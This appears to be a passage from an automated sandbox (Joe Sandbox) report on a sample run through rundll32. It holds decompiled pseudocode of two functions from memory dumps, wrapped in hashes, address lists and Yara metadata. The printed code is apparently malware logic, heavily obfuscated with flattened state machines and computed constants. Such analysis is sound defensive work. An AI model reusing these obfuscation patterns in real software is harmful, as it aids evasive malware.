                                                                      0x01ff963e
                                                                      0x01ff9636
                                                                      0x01ff962e
                                                                      0x00000000
                                                                      0x01ff96dc
                                                                      0x01ff96dc
                                                                      0x01ff96dc
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %M$-$>#$Y$g#$lW$qu$>#$c$z
                                                                      • API String ID: 0-2374964813
                                                                      • Opcode ID: de3c8303d3afa683ad230a9c6f16e67f513d3a93420d356ad213b772e6f8532c
                                                                      • Instruction ID: 18646743a33fdaf7d5ec676ff6a0714b5269f0a58eb6d9ad296d40a919723d48
                                                                      • Opcode Fuzzy Hash: de3c8303d3afa683ad230a9c6f16e67f513d3a93420d356ad213b772e6f8532c
                                                                      • Instruction Fuzzy Hash: 3BE122B2909741DFE364CF65C88991FBBE1BFD4708F108A1DF295862A0D7B69909CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF4D90, Relevance: 12.8, Strings: 10, Instructions: 326COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E01FF4D90() {
				char _v524;
				unsigned int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t364;
				intOrPtr _t367;
				void* _t372;
				char _t382;
				void* _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int* _t425;

				_t425 =  &_v700;
				_v664 = 0x9fa1;
				_v664 = _v664 >> 0xf;
				_t372 = 0x3b39200;
				_v664 = _v664 + 0x495e;
				_v664 = _v664 * 0x17;
				_t412 = 0;
				_v664 = _v664 ^ 0x00069788;
				_v604 = 0xceb5;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x00000106;
				_v624 = 0xb514;
				_v624 = _v624 + 0xffffa476;
				_t413 = 0x15;
				_v624 = _v624 * 0x46;
				_v624 = _v624 ^ 0x00187a00;
				_v668 = 0x7309;
				_v668 = _v668 * 0x23;
				_v668 = _v668 >> 3;
				_v668 = _v668 ^ 0x5792a418;
				_v668 = _v668 ^ 0x57934680;
				_v676 = 0x9940;
				_v676 = _v676 + 0xffff3182;
				_v676 = _v676 / _t413;
				_t414 = 0x57;
				_v676 = _v676 / _t414;
				_v676 = _v676 ^ 0x0023e38f;
				_v700 = 0xa5bb;
				_v700 = _v700 | 0x2eb34f51;
				_t415 = 0x69;
				_v700 = _v700 / _t415;
				_v700 = _v700 + 0xffff1835;
				_v700 = _v700 ^ 0x00708bbe;
				_v640 = 0x8462;
				_t416 = 0x31;
				_v640 = _v640 / _t416;
				_v640 = _v640 | 0xf5b8cac2;
				_v640 = _v640 ^ 0xf5b8b775;
				_v644 = 0x4c0;
				_v644 = _v644 + 0xfffff031;
				_v644 = _v644 << 0xf;
				_v644 = _v644 ^ 0xfa78cc6a;
				_v576 = 0x47f3;
				_v576 = _v576 | 0x1c217342;
				_v576 = _v576 ^ 0x1c214363;
				_v600 = 0x6198;
				_v600 = _v600 << 5;
				_v600 = _v600 ^ 0x000c7289;
				_v632 = 0xa609;
				_v632 = _v632 + 0xaff1;
				_v632 = _v632 + 0xffff061b;
				_v632 = _v632 ^ 0x0000381f;
				_v584 = 0x236b;
				_v584 = _v584 | 0x1d93d101;
				_v584 = _v584 ^ 0x1d9382a6;
				_v580 = 0xb44f;
				_v580 = _v580 ^ 0x84ec8f50;
				_v580 = _v580 ^ 0x84ec3805;
				_v592 = 0x2849;
				_v592 = _v592 >> 8;
				_v592 = _v592 ^ 0x00006208;
				_v684 = 0xffa5;
				_v684 = _v684 >> 4;
				_t417 = 0xb;
				_v684 = _v684 * 0x1c;
				_v684 = _v684 << 0xc;
				_v684 = _v684 ^ 0x1bf5e695;
				_v692 = 0x7e89;
				_v692 = _v692 + 0x2efa;
				_v692 = _v692 / _t417;
				_v692 = _v692 + 0x2a18;
				_v692 = _v692 ^ 0x000064a1;
				_v596 = 0xa252;
				_t418 = 0x59;
				_v596 = _v596 * 9;
				_v596 = _v596 ^ 0x0005d303;
				_v680 = 0xbeb4;
				_v680 = _v680 >> 2;
				_v680 = _v680 + 0x1673;
				_v680 = _v680 + 0x7062;
				_v680 = _v680 ^ 0x0000a375;
				_v648 = 0x506f;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 / _t418;
				_v648 = _v648 ^ 0x00002d61;
				_v656 = 0xa4c4;
				_t419 = 0x3f;
				_v656 = _v656 / _t419;
				_v656 = _v656 ^ 0xb08d55bb;
				_v656 = _v656 + 0x38bc;
				_v656 = _v656 ^ 0xb08d947f;
				_v688 = 0x4e3f;
				_v688 = _v688 >> 8;
				_v688 = _v688 >> 4;
				_t420 = 0x52;
				_v688 = _v688 / _t420;
				_v688 = _v688 ^ 0x00004d88;
				_v672 = 0x8701;
				_v672 = _v672 >> 9;
				_t421 = 0x24;
				_v672 = _v672 * 7;
				_v672 = _v672 >> 0xe;
				_v672 = _v672 ^ 0x000031cf;
				_v636 = 0x4a3c;
				_v636 = _v636 >> 0xa;
				_v636 = _v636 / _t421;
				_v636 = _v636 ^ 0x00005769;
				_v612 = 0x66c7;
				_v612 = _v612 << 0xc;
				_v612 = _v612 ^ 0x7aee3ef9;
				_v612 = _v612 ^ 0x7c821959;
				_v628 = 0x44bc;
				_v628 = _v628 << 0xb;
				_v628 = _v628 << 4;
				_v628 = _v628 ^ 0x225e6a59;
				_v696 = 0xf2f9;
				_t422 = 0x36;
				_v696 = _v696 / _t422;
				_v696 = _v696 << 4;
				_v696 = _v696 << 7;
				_v696 = _v696 ^ 0x0023cdd9;
				_v652 = 0xfa07;
				_v652 = _v652 ^ 0xfb6d8595;
				_v652 = _v652 | 0xb1ef9277;
				_v652 = _v652 * 0x2f;
				_v652 = _v652 ^ 0x410fad88;
				_v608 = 0x638e;
				_v608 = _v608 * 0x64;
				_v608 = _v608 ^ 0x0026a181;
				_v660 = 0xd0ef;
				_v660 = _v660 << 0xc;
				_v660 = _v660 + 0xdc19;
				_v660 = _v660 << 0xc;
				_v660 = _v660 ^ 0xfcc19d1e;
				_t371 = _v608;
				_v616 = 0x9e76;
				_v616 = _v616 + 0xffffc7b8;
				_v616 = _v616 + 0xb6c0;
				_v616 = _v616 ^ 0x000153b0;
				_v588 = 0xaa15;
				_v588 = _v588 >> 0x10;
				_v620 = 0x4821;
				_v620 = _v620 >> 0xb;
				_v620 = _v620 ^ 0xbb1b7ef2;
				_v620 = _v620 ^ 0xbb1b7ef8;
				do {
					while(_t372 != 0x3b39200) {
						if(_t372 == 0x724dd21) {
							E02004291(_v624, _v668,  &_v572, _v676);
							_t372 = 0x23ca7f5b;
							continue;
						} else {
							if(_t372 == 0x1549ba03) {
								_push(0x1ff12d8);
								_push(_v576);
								_push(_v644);
								E01FFA4D7(__eflags, _v632, _v584, _v580, _v592, E01FF5DFC(_v700, _v640, __eflags),  *0x2011088 + 0x254,  &_v524,  *0x2011088 + 0x38);
								E02000D6D(_v684, _v692, _v596, _t356);
								_t425 =  &(_t425[0xd]);
								_t372 = 0x2c137c18;
								continue;
							} else {
								if(_t372 == 0x23ca7f5b) {
									_v572 = _v572 - E01FF47EB();
									_t372 = 0x1549ba03;
									asm("sbb [esp+0x94], edx");
									continue;
								} else {
									if(_t372 == 0x2c137c18) {
										_push(_t372);
										_t364 = E0200C0C8(_v664, _v604, _v680,  &_v524, _v648, _v656, 0, _v688, _t372, _v620, _v672);
										_t371 = _t364;
										_t425 =  &(_t425[0xa]);
										__eflags = _t364 - 0xffffffff;
										if(__eflags != 0) {
											_t372 = 0x32dad644;
											continue;
										}
									} else {
										if(_t372 == 0x2cffd5ae) {
											E01FFF1ED(_v652, _v608, _v660, _v616, _t371);
										} else {
											if(_t372 != 0x32dad644) {
												goto L15;
											} else {
												_t382 = _v572;
												_t367 = _v568;
												_push(_t382);
												_v560 = _t367;
												_v552 = _t367;
												_v544 = _t367;
												_v536 = _t367;
												_v532 = _v588;
												_v564 = _t382;
												_v556 = _t382;
												_v548 = _t382;
												_v540 = _t382;
												E020041CA(_t371, _v636, _v612, _v628,  &_v564, _t382, _v696);
												_t425 =  &(_t425[6]);
												_t412 =  !=  ? 1 : _t412;
												_t372 = 0x2cffd5ae;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t412;
					}
					_t372 = 0x724dd21;
					L15:
					__eflags = _t372 - 0x140d4499;
				} while (__eflags != 0);
				goto L18;
			}































































                                                                      0x01ff4d90
                                                                      0x01ff4d96
                                                                      0x01ff4da0
                                                                      0x01ff4da5
                                                                      0x01ff4daa
                                                                      0x01ff4dbb
                                                                      0x01ff4dbf
                                                                      0x01ff4dc1
                                                                      0x01ff4dc9
                                                                      0x01ff4dd1
                                                                      0x01ff4dd6
                                                                      0x01ff4dde
                                                                      0x01ff4de6
                                                                      0x01ff4df5
                                                                      0x01ff4df8
                                                                      0x01ff4dfc
                                                                      0x01ff4e04
                                                                      0x01ff4e11
                                                                      0x01ff4e15
                                                                      0x01ff4e1a
                                                                      0x01ff4e22
                                                                      0x01ff4e2a
                                                                      0x01ff4e32
                                                                      0x01ff4e42
                                                                      0x01ff4e4a
                                                                      0x01ff4e4f
                                                                      0x01ff4e55
                                                                      0x01ff4e5d
                                                                      0x01ff4e65
                                                                      0x01ff4e71
                                                                      0x01ff4e76
                                                                      0x01ff4e7c
                                                                      0x01ff4e84
                                                                      0x01ff4e8c
                                                                      0x01ff4e98
                                                                      0x01ff4e9b
                                                                      0x01ff4e9f
                                                                      0x01ff4ea7
                                                                      0x01ff4eaf
                                                                      0x01ff4eb7
                                                                      0x01ff4ebf
                                                                      0x01ff4ec4
                                                                      0x01ff4ecc
                                                                      0x01ff4ed7
                                                                      0x01ff4ee2
                                                                      0x01ff4eed
                                                                      0x01ff4ef5
                                                                      0x01ff4efa
                                                                      0x01ff4f02
                                                                      0x01ff4f0a
                                                                      0x01ff4f12
                                                                      0x01ff4f1a
                                                                      0x01ff4f22
                                                                      0x01ff4f2d
                                                                      0x01ff4f38
                                                                      0x01ff4f43
                                                                      0x01ff4f4e
                                                                      0x01ff4f59
                                                                      0x01ff4f64
                                                                      0x01ff4f6c
                                                                      0x01ff4f73
                                                                      0x01ff4f7b
                                                                      0x01ff4f83
                                                                      0x01ff4f8f
                                                                      0x01ff4f92
                                                                      0x01ff4f96
                                                                      0x01ff4f9b
                                                                      0x01ff4fa3
                                                                      0x01ff4fab
                                                                      0x01ff4fbb
                                                                      0x01ff4fbf
                                                                      0x01ff4fc7
                                                                      0x01ff4fcf
                                                                      0x01ff4fdc
                                                                      0x01ff4fdf
                                                                      0x01ff4fe3
                                                                      0x01ff4feb
                                                                      0x01ff4ff3
                                                                      0x01ff4ff8
                                                                      0x01ff5000
                                                                      0x01ff5008
                                                                      0x01ff5010
                                                                      0x01ff5018
                                                                      0x01ff5025
                                                                      0x01ff5029
                                                                      0x01ff5031
                                                                      0x01ff503d
                                                                      0x01ff5042
                                                                      0x01ff5048
                                                                      0x01ff5050
                                                                      0x01ff5058
                                                                      0x01ff5060
                                                                      0x01ff5068
                                                                      0x01ff506d
                                                                      0x01ff5076
                                                                      0x01ff507b
                                                                      0x01ff5081
                                                                      0x01ff5089
                                                                      0x01ff5091
                                                                      0x01ff509b
                                                                      0x01ff509c
                                                                      0x01ff50a0
                                                                      0x01ff50a5
                                                                      0x01ff50ad
                                                                      0x01ff50b5
                                                                      0x01ff50c0
                                                                      0x01ff50c4
                                                                      0x01ff50cc
                                                                      0x01ff50d4
                                                                      0x01ff50d9
                                                                      0x01ff50e1
                                                                      0x01ff50e9
                                                                      0x01ff50f1
                                                                      0x01ff50f6
                                                                      0x01ff50fb
                                                                      0x01ff5103
                                                                      0x01ff5118
                                                                      0x01ff511b
                                                                      0x01ff511f
                                                                      0x01ff5124
                                                                      0x01ff5129
                                                                      0x01ff5131
                                                                      0x01ff5139
                                                                      0x01ff5141
                                                                      0x01ff514e
                                                                      0x01ff5152
                                                                      0x01ff515a
                                                                      0x01ff5167
                                                                      0x01ff516b
                                                                      0x01ff5173
                                                                      0x01ff517b
                                                                      0x01ff5180
                                                                      0x01ff5188
                                                                      0x01ff518d
                                                                      0x01ff5195
                                                                      0x01ff5199
                                                                      0x01ff51a1
                                                                      0x01ff51a9
                                                                      0x01ff51b1
                                                                      0x01ff51b9
                                                                      0x01ff51c4
                                                                      0x01ff51da
                                                                      0x01ff51e2
                                                                      0x01ff51e7
                                                                      0x01ff51ef
                                                                      0x01ff51f7
                                                                      0x01ff51f7
                                                                      0x01ff5205
                                                                      0x01ff53d1
                                                                      0x01ff53d8
                                                                      0x00000000
                                                                      0x01ff520b
                                                                      0x01ff5211
                                                                      0x01ff533a
                                                                      0x01ff533f
                                                                      0x01ff5346
                                                                      0x01ff5396
                                                                      0x01ff53ab
                                                                      0x01ff53b0
                                                                      0x01ff53b3
                                                                      0x00000000
                                                                      0x01ff5217
                                                                      0x01ff521d
                                                                      0x01ff5322
                                                                      0x01ff5329
                                                                      0x01ff532e
                                                                      0x00000000
                                                                      0x01ff5223
                                                                      0x01ff5229
                                                                      0x01ff52d1
                                                                      0x01ff5300
                                                                      0x01ff5305
                                                                      0x01ff5307
                                                                      0x01ff530a
                                                                      0x01ff530d
                                                                      0x01ff5313
                                                                      0x00000000
                                                                      0x01ff5313
                                                                      0x01ff522f
                                                                      0x01ff5235
                                                                      0x01ff5403
                                                                      0x01ff523b
                                                                      0x01ff5241
                                                                      0x00000000
                                                                      0x01ff5247
                                                                      0x01ff5247
                                                                      0x01ff524e
                                                                      0x01ff5255
                                                                      0x01ff5256
                                                                      0x01ff525d
                                                                      0x01ff5264
                                                                      0x01ff526b
                                                                      0x01ff527d
                                                                      0x01ff5291
                                                                      0x01ff52a0
                                                                      0x01ff52a7
                                                                      0x01ff52ae
                                                                      0x01ff52b7
                                                                      0x01ff52be
                                                                      0x01ff52c4
                                                                      0x01ff52c7
                                                                      0x00000000
                                                                      0x01ff52c7
                                                                      0x01ff5241
                                                                      0x01ff5235
                                                                      0x01ff5229
                                                                      0x01ff521d
                                                                      0x01ff5211
                                                                      0x01ff540b
                                                                      0x01ff5417
                                                                      0x01ff5417
                                                                      0x01ff53e2
                                                                      0x01ff53e4
                                                                      0x01ff53e4
                                                                      0x01ff53e4
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: s$!H$?N$I($Yj^"$^I$a-$bp$iW$k#
                                                                      • API String ID: 0-2383980949
                                                                      • Opcode ID: 3a7b7d2aee1d2da099ab02c0b435a3e1fdf31419516e32818dd925bfee935484
                                                                      • Instruction ID: 8ddae67e05001bd472bb24a1e0bc6b36963aba3e80d0bb046846a1466a0f1e61
                                                                      • Opcode Fuzzy Hash: 3a7b7d2aee1d2da099ab02c0b435a3e1fdf31419516e32818dd925bfee935484
                                                                      • Instruction Fuzzy Hash: D9F11271508380DFE368CF25D589A5BBBE1BFC4758F108A1DF29A962A0C7B58949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00234304, Relevance: 12.8, Strings: 10, Instructions: 326COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: s$!H$?N$I($Yj^"$^I$a-$bp$iW$k#
                                                                      • API String ID: 0-2383980949
                                                                      • Opcode ID: 53375b368af7517bad7c4fad8f15d908feaf64c991a717236934422a6675b11b
                                                                      • Instruction ID: a39994f54c49b5df98277221f69536f0cb668e74ee46e5dad5ae219ec601db00
                                                                      • Opcode Fuzzy Hash: 53375b368af7517bad7c4fad8f15d908feaf64c991a717236934422a6675b11b
                                                                      • Instruction Fuzzy Hash: 21F122B1508380CFE368DF25C589A5BBBE1BBC5758F108A1DF1DA962A0C7B58949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200D70B, Relevance: 12.8, Strings: 10, Instructions: 258COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 78%
                                                                      			E0200D70B(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t250;
				intOrPtr _t253;
				intOrPtr* _t256;
				intOrPtr _t257;
				intOrPtr _t258;
				intOrPtr _t259;
				intOrPtr _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				void* _t272;
				void* _t301;
				intOrPtr* _t307;
				void* _t308;
				void* _t311;
				signed int* _t312;

				_t312 =  &_v96;
				_v16 = 0xfaeb;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x001f68fb;
				_v20 = 0x715d;
				_t311 = __edx;
				_t262 = __ecx;
				_t307 = 0;
				_t264 = 0x69;
				_v20 = _v20 / _t264;
				_v20 = _v20 ^ 0x00004d95;
				_t308 = 0x6d0b453;
				_v52 = 0xe4dc;
				_v52 = _v52 ^ 0xb66ed69d;
				_v52 = _v52 | 0x051c73ce;
				_v52 = _v52 ^ 0xb77e6da2;
				_v56 = 0xfea7;
				_v56 = _v56 | 0x2ac21b6d;
				_t265 = 0x28;
				_v56 = _v56 / _t265;
				_v56 = _v56 ^ 0x0111c769;
				_v40 = 0x7de3;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x00002cee;
				_v60 = 0x3598;
				_v60 = _v60 + 0xffff8bc6;
				_v60 = _v60 + 0xffffa8a6;
				_v60 = _v60 ^ 0xffff128a;
				_v48 = 0x4fef;
				_v48 = _v48 ^ 0xca9c5515;
				_v48 = _v48 + 0xb16f;
				_v48 = _v48 ^ 0xca9cd0c6;
				_v92 = 0xaa9;
				_t266 = 0x5f;
				_v92 = _v92 / _t266;
				_v92 = _v92 + 0xffff3c6a;
				_t267 = 0x59;
				_v92 = _v92 / _t267;
				_v92 = _v92 ^ 0x02e036a9;
				_v96 = 0x5de2;
				_v96 = _v96 + 0xffffe6a1;
				_v96 = _v96 << 0xa;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x00042069;
				_v36 = 0x38d5;
				_v36 = _v36 >> 9;
				_v36 = _v36 ^ 0x00004e11;
				_v28 = 0x56eb;
				_v28 = _v28 | 0x64f5fc98;
				_v28 = _v28 ^ 0x64f5ec13;
				_v32 = 0x795a;
				_v32 = _v32 + 0x3d0e;
				_v32 = _v32 ^ 0x0000bf29;
				_v24 = 0xb411;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x000029d3;
				_v88 = 0x662b;
				_v88 = _v88 + 0xffff211d;
				_v88 = _v88 >> 0xa;
				_v88 = _v88 + 0xa5d0;
				_v88 = _v88 ^ 0x0040a179;
				_v76 = 0x93a7;
				_v76 = _v76 | 0xd5df8e88;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0xa2f79e4d;
				_v76 = _v76 ^ 0xafaa69d8;
				_v44 = 0x9179;
				_v44 = _v44 | 0xc93173a7;
				_v44 = _v44 + 0xffff069d;
				_v44 = _v44 ^ 0xc930e98d;
				_v80 = 0xde50;
				_v80 = _v80 << 1;
				_v80 = _v80 ^ 0x604d01d6;
				_v80 = _v80 | 0x2ae37b3d;
				_v80 = _v80 ^ 0x6aefa4f8;
				_v84 = 0xd578;
				_v84 = _v84 << 0xe;
				_t268 = 0x68;
				_v84 = _v84 / _t268;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0000750e;
				_v64 = 0x2e2a;
				_v64 = _v64 << 3;
				_t269 = 0x30;
				_v64 = _v64 / _t269;
				_v64 = _v64 + 0xffff5448;
				_v64 = _v64 ^ 0xffff6494;
				_v68 = 0x2d37;
				_t270 = 0xc;
				_v68 = _v68 / _t270;
				_v68 = _v68 >> 0x10;
				_t271 = 0x67;
				_v68 = _v68 / _t271;
				_v68 = _v68 ^ 0x00004502;
				_v12 = 0x26d1;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x026d46c6;
				_v72 = 0x25a0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 << 0xf;
				_v72 = _v72 | 0x287c3bd2;
				_v72 = _v72 ^ 0x797c3acd;
				_v4 = 0x7952;
				_v4 = _v4 * 0x12;
				_v4 = _v4 ^ 0x0008812f;
				_v8 = 0x95b5;
				_v8 = _v8 + 0xffff9cc1;
				_v8 = _v8 ^ 0x000073a2;
				while(1) {
					L1:
					_t250 = 0x6ec61ec;
					while(1) {
						L2:
						_t272 = 0x5c1247c;
						do {
							L3:
							while(_t308 != 0x28e0d0b) {
								if(_t308 == 0x57801b6) {
									return E01FFDE81(_v4, _t307, _v8);
								}
								if(_t308 == _t272) {
									 *((intOrPtr*)(_t307 + 0x44)) = _t262;
									_t253 =  *0x2011084;
									 *_t307 = _t253;
									 *0x2011084 = _t307;
									return _t253;
								}
								if(_t308 == 0x6d0b453) {
									_push(_t272);
									_t301 = 0x50;
									_t256 = E01FF54FB(_t301);
									_t307 = _t256;
									__eflags = _t307;
									if(__eflags == 0) {
										return _t256;
									}
									_t308 = 0x22b948bf;
									while(1) {
										L1:
										_t250 = 0x6ec61ec;
										L2:
										_t272 = 0x5c1247c;
										goto L3;
									}
								}
								if(_t308 == _t250) {
									_push(E0200C192);
									_push(_v84);
									_push(_t272);
									_push(_v80);
									_push(_v44);
									_t257 = E01FF903E(_t307, _v76);
									_t312 = _t312 - 0xc + 0x20;
									 *((intOrPtr*)(_t307 + 0x28)) = _t257;
									__eflags = _t257;
									_t272 = 0x5c1247c;
									_t250 = 0x6ec61ec;
									_t308 =  !=  ? 0x5c1247c : 0x28e0d0b;
									continue;
								}
								if(_t308 == 0x206c9a2f) {
									_t258 = E01FF3B5C( *((intOrPtr*)(_t307 + 8)), _v24, _v88);
									_t312 =  &(_t312[1]);
									 *((intOrPtr*)(_t307 + 0x18)) = _t258;
									__eflags = _t258;
									_t250 = 0x6ec61ec;
									_t308 =  !=  ? 0x6ec61ec : 0x28e0d0b;
									goto L2;
								}
								_t321 = _t308 - 0x22b948bf;
								if(_t308 != 0x22b948bf) {
									goto L18;
								}
								_push(_t272);
								_t259 = E01FF5B7D(_v52, _t311, _t321, _v56, _v40, _v60);
								_t312 =  &(_t312[4]);
								 *((intOrPtr*)(_t307 + 8)) = _t259;
								if(_t259 == 0) {
									_t308 = 0x57801b6;
								} else {
									E01FF5696(_v48,  *((intOrPtr*)(_t307 + 8)), _v92, _v96,  *((intOrPtr*)(_t307 + 8)), _v36);
									_push(_v32);
									E02001A48( *((intOrPtr*)(_t307 + 8)));
									_t312 =  &(_t312[5]);
									_t308 = 0x206c9a2f;
								}
								goto L1;
							}
							E0200A8BF(_v64, _v68, _v12, _v72,  *((intOrPtr*)(_t307 + 8)));
							_t312 =  &(_t312[3]);
							_t308 = 0x57801b6;
							_t250 = 0x6ec61ec;
							_t272 = 0x5c1247c;
							L18:
							__eflags = _t308 - 0x6c42194;
						} while (__eflags != 0);
						return _t250;
					}
				}
			}
















































                                                                      0x0200d70b
                                                                      0x0200d70e
                                                                      0x0200d716
                                                                      0x0200d71b
                                                                      0x0200d723
                                                                      0x0200d733
                                                                      0x0200d735
                                                                      0x0200d73b
                                                                      0x0200d73d
                                                                      0x0200d742
                                                                      0x0200d748
                                                                      0x0200d750
                                                                      0x0200d755
                                                                      0x0200d75d
                                                                      0x0200d765
                                                                      0x0200d76d
                                                                      0x0200d775
                                                                      0x0200d77d
                                                                      0x0200d789
                                                                      0x0200d78e
                                                                      0x0200d794
                                                                      0x0200d79c
                                                                      0x0200d7a4
                                                                      0x0200d7a9
                                                                      0x0200d7b1
                                                                      0x0200d7b9
                                                                      0x0200d7c1
                                                                      0x0200d7c9
                                                                      0x0200d7d1
                                                                      0x0200d7d9
                                                                      0x0200d7e1
                                                                      0x0200d7e9
                                                                      0x0200d7f1
                                                                      0x0200d7fd
                                                                      0x0200d802
                                                                      0x0200d808
                                                                      0x0200d814
                                                                      0x0200d817
                                                                      0x0200d81b
                                                                      0x0200d823
                                                                      0x0200d82b
                                                                      0x0200d833
                                                                      0x0200d838
                                                                      0x0200d83d
                                                                      0x0200d845
                                                                      0x0200d84d
                                                                      0x0200d852
                                                                      0x0200d85a
                                                                      0x0200d862
                                                                      0x0200d86a
                                                                      0x0200d872
                                                                      0x0200d87a
                                                                      0x0200d882
                                                                      0x0200d88a
                                                                      0x0200d892
                                                                      0x0200d897
                                                                      0x0200d89f
                                                                      0x0200d8a7
                                                                      0x0200d8af
                                                                      0x0200d8b4
                                                                      0x0200d8bc
                                                                      0x0200d8c4
                                                                      0x0200d8cc
                                                                      0x0200d8d6
                                                                      0x0200d8db
                                                                      0x0200d8e3
                                                                      0x0200d8eb
                                                                      0x0200d8f3
                                                                      0x0200d8fb
                                                                      0x0200d903
                                                                      0x0200d90b
                                                                      0x0200d913
                                                                      0x0200d917
                                                                      0x0200d91f
                                                                      0x0200d927
                                                                      0x0200d92f
                                                                      0x0200d937
                                                                      0x0200d942
                                                                      0x0200d947
                                                                      0x0200d94d
                                                                      0x0200d952
                                                                      0x0200d95a
                                                                      0x0200d962
                                                                      0x0200d96b
                                                                      0x0200d970
                                                                      0x0200d976
                                                                      0x0200d97e
                                                                      0x0200d986
                                                                      0x0200d992
                                                                      0x0200d997
                                                                      0x0200d99d
                                                                      0x0200d9a6
                                                                      0x0200d9a9
                                                                      0x0200d9ad
                                                                      0x0200d9b5
                                                                      0x0200d9bd
                                                                      0x0200d9c2
                                                                      0x0200d9ca
                                                                      0x0200d9d7
                                                                      0x0200d9db
                                                                      0x0200d9e0
                                                                      0x0200d9e8
                                                                      0x0200d9f0
                                                                      0x0200d9fd
                                                                      0x0200da01
                                                                      0x0200da09
                                                                      0x0200da11
                                                                      0x0200da19
                                                                      0x0200da21
                                                                      0x0200da21
                                                                      0x0200da21
                                                                      0x0200da26
                                                                      0x0200da26
                                                                      0x0200da26
                                                                      0x0200da2b
                                                                      0x00000000
                                                                      0x0200da2b
                                                                      0x0200da3d
                                                                      0x00000000
                                                                      0x0200dbbb
                                                                      0x0200da45
                                                                      0x0200db9a
                                                                      0x0200db9d
                                                                      0x0200dba2
                                                                      0x0200dba4
                                                                      0x00000000
                                                                      0x0200dba4
                                                                      0x0200da51
                                                                      0x0200db48
                                                                      0x0200db4b
                                                                      0x0200db4c
                                                                      0x0200db51
                                                                      0x0200db54
                                                                      0x0200db56
                                                                      0x0200dbc3
                                                                      0x0200dbc3
                                                                      0x0200db58
                                                                      0x0200da21
                                                                      0x0200da21
                                                                      0x0200da21
                                                                      0x0200da26
                                                                      0x0200da26
                                                                      0x00000000
                                                                      0x0200da26
                                                                      0x0200da21
                                                                      0x0200da59
                                                                      0x0200db01
                                                                      0x0200db09
                                                                      0x0200db0d
                                                                      0x0200db0e
                                                                      0x0200db14
                                                                      0x0200db1c
                                                                      0x0200db21
                                                                      0x0200db24
                                                                      0x0200db27
                                                                      0x0200db2e
                                                                      0x0200db33
                                                                      0x0200db38
                                                                      0x00000000
                                                                      0x0200db38
                                                                      0x0200da65
                                                                      0x0200dae2
                                                                      0x0200dae7
                                                                      0x0200daea
                                                                      0x0200daed
                                                                      0x0200daf4
                                                                      0x0200daf9
                                                                      0x00000000
                                                                      0x0200daf9
                                                                      0x0200da67
                                                                      0x0200da6d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200da73
                                                                      0x0200da86
